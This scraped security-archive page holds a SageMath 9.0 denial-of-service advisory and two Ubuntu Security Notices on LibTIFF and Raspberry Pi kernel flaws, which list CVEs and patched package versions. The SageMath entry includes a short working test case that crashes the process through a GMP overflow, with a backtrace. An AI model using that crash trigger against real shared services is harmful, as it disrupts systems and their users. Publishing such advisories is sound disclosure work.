    sagemath 9.0 and reportedly later on ubuntu 20.sagemath gives access to the python interpreter,so code execution is trivial.We give DoS attacks, which terminates the sagemath processwith abort(), when raising symbolic expression to large integer power.We get abort() with stack:gmp: overflow in mpz type#6  0x00007f55c83ee72e in __GI_abort () at/build/glibc-SzIz7B/glibc-2.31/stdlib/abort.c:79#7  0x00007f55c56e0d20 in __gmpz_realloc ()#8  0x00007f55c56dd2b0 in __gmpz_n_pow_ui ()#9  0x0000000000000000 in GiNaC::numeric::power(long) const ()#10 0x0000000000000000 in GiNaC::numeric::pow_intexp(GiNaC::numericconst&) const ()The non-minimal testcase===#sagemath code, copyright Georgi Guninskidef binnk3u(n,k):  return ( (n/k)**(k))n1=(2*10**3);d0=29004853178239;n0=SR(log(n1));tt=binnk3u(n0+d0-1,d0);print("passed :(")===

Sagemath 9.0 Overflow / Denial Of Service

Ubuntu Security Notice 5604-1 - It was discovered that LibTIFF incorrectly handled certain files. An attacker could possibly use this issue to cause a denial of service, or possibly execute arbitrary code. It was discovered that LibTIFF incorrectly handled certain files. An attacker could possibly use this issue to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-5604-1September 08, 2022tiff vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESM- Ubuntu 14.04 ESMSummary:Several security issues were fixed in LibTIFF.Software Description:- tiff: Tag Image File Format (TIFF) libraryDetails:It was discovered that LibTIFF incorrectly handled certain files.An attacker could possibly use this issue to cause a denial of service,or possibly execute arbitrary code. (CVE-2022-2867, CVE-2022-2869)It was discovered that LibTIFF incorrectly handled certain files.An attacker could possibly use this issue to cause a denial of service.(CVE-2022-2868)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:   libtiff-opengl                  4.0.6-1ubuntu0.8+esm3   libtiff-tools                   4.0.6-1ubuntu0.8+esm3   libtiff5                        4.0.6-1ubuntu0.8+esm3   libtiffxx5                      4.0.6-1ubuntu0.8+esm3Ubuntu 14.04 ESM:   libtiff-opengl                  4.0.3-7ubuntu0.11+esm3   libtiff-tools                   4.0.3-7ubuntu0.11+esm3   libtiff5                        4.0.3-7ubuntu0.11+esm3   libtiffxx5                      4.0.3-7ubuntu0.11+esm3In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-5604-1   CVE-2022-2867, CVE-2022-2868, CVE-2022-2869

Ubuntu Security Notice USN-5604-1

Ubuntu Security Notice 5603-1 - Asaf Modelevsky discovered that the Intel 10GbE PCI Express Ethernet driver for the Linux kernel performed insufficient control flow management. A local attacker could possibly use this to cause a denial of service. It was discovered that the virtual terminal driver in the Linux kernel did not properly handle VGA console font changes, leading to an out-of-bounds write. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5603-1September 08, 2022linux-raspi-5.4 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-raspi-5.4: Linux kernel for Raspberry Pi systemsDetails:Asaf Modelevsky discovered that the Intel(R) 10GbE PCI Express (ixgbe)Ethernet driver for the Linux kernel performed insufficient control flowmanagement. A local attacker could possibly use this to cause a denial of service. (CVE-2021-33061)It was discovered that the virtual terminal driver in the Linux kernel did not properly handle VGA console font changes, leading to an out-of-bounds write. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33656)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS:   linux-image-5.4.0-1069-raspi    5.4.0-1069.79~18.04.1   linux-image-raspi-hwe-18.04     5.4.0.1069.69After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-5603-1   CVE-2021-33061, CVE-2021-33656Package Information: https://launchpad.net/ubuntu/+source/linux-raspi-5.4/5.4.0-1069.79~18.04.1

Tag

#ubuntu